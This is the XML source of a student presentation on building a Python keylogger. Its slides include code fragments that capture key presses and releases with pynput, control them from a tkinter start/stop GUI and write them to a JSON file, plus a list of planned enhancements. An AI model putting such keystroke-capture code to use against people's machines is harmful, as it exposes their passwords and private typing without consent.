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56" d="100"/>
          <a:sy n="56"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4/5/2024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4154075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095137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6694208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2045472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00615976"/>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85309506"/>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24602171"/>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40280707"/>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0430027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2626040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1435826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947848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3396915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803480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8962292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8563476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54204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rot="0">
            <a:off x="10485002" y="6437910"/>
            <a:ext cx="1125804" cy="365126"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>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7"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4/5/2024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noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10558300" y="6423914"/>
            <a:ext cx="105251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74872231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8428319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3297537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73911324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8"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77"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76"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75"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71"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72"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73"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74"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58279167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554038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4743133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4137365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336999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9728174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658603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9481011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952882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1379663726"/>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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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hyperlink" Target="https://github.com/techtrainer20/TNSDC" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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slideLayout" Target="../slideLayouts/slideLayout1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1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keyloggers</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3117529" y="4510166"/>
            <a:ext cx="7980183" cy="681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1.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Vigneshwaran K -Dmi college of engineering IT</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87494427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7"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8" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a: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9" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="480131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Define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start_keylogger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function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def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start_keylogger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global listener</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listener =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keyboard.Listener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on_press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on_press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on_release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on_release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listener.start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label.config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(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config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(state='disabled')</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stop_button.config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(state='normal')</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Define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stop_keylogger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function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def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stop_keylogger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global listener</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listener.stop</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label.config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(text="Keylogger stopped.")</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start_button</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56116608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pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4176964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pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="904352" y="1692539"/>
            <a:ext cx="7487694" cy="752580"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="720801" y="3458123"/>
            <a:ext cx="11250407" cy="1563407"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2067980884"/>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66" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="901232" y="0"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>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zh-CN" altLang="en-US" sz="20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898730975"/>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7"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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>There are several ways in which the keylogger program can be improved and enhanced in the future. Here are some possible ideas:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1"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Real-time monitoring: The program can be enhanced to provide real-time monitoring of keystrokes. This can be useful for detecting and preventing malicious activities in real-time.</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Filtering of specific keywords: The program can be enhanced to filter specific keywords and provide alerts when those keywords are detected. This can be useful for detecting and preventing unauthorized access to sensitive information.</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Integration with other security tools: The program can be integrated with other security tools, such as firewalls and intrusion detection systems, to provide a more comprehensive security solution.</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Cross-platform compatibility: The program can be enhanced to support cross-platform compatibility, allowing it to be used on different operating systems.</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Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</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68"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923968976"/>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9"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70"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a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</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a:rPr>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982481902"/>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9"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26480733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7" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="58649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47834631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581192" y="3232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lvl="1" marL="629412" indent="-305435" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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374151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Times New Roman"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zh-CN" altLang="en-US" sz="2400" b="0"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185831590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909017" y="23393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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>To overcome the limitations of the existing keylogger program, we propose to develop a new keylogger with the following features:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1"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Improved keylogging functionality: The new keylogger will be able to differentiate between key presses and key releases and record them separately.</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GUI for easy start and stop of the keylogger: The new keylogger will have a GUI that allows the user to start and stop the keylogger with a single click.</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JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</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81832544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华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1145611"/>
            <a:ext cx="11791686" cy="3787649"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="0" tIns="198375" rIns="0" bIns="198375"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000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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None/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="1"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ClrTx/>
              <a:buAutoNum type="arabicPeriod"/>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Design the GUI: Create a simple GUI using </a:t>
            </a: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tkinter</a:t>
            </a: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 that includes a start and stop button.</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ClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>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Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a: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 library to capture the key presses and releases.</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ClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>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Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a: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 library to generate a JSON file that contains the</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None/>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     </a:t>
            </a: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 keylogging data.</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ClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>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Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.</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None/>
            </a:pP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ClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>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Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.</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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210156794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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="380989" y="477168"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123940756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9" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="218429" y="-431231"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955278" cy="4667901"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24625302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1"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2" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a: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3" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="563231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Initialize the variables</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flag = False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 =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Define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on_press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function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def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on_press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global flag,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keys</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if flag == False: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keys_used.append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{'Pressed': f'{key}'}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flag = True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if flag == True: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keys_used.append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{'Held': f'{key}'}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49121776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5" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a: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6" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="507831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Define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on_release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function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def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on_release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global flag,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keys</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keys_used.append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{'Released': f'{key}'}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if flag == True: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flag = False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keys = keys + str(key)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Define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generate_json_file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function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def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generate_json_file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with open('</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key_log.json</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wb</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as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key_log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key_list_bytes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json.dumps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).encode()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key_log.write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key_list_bytes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809815477"/>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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-05T01:08:19Z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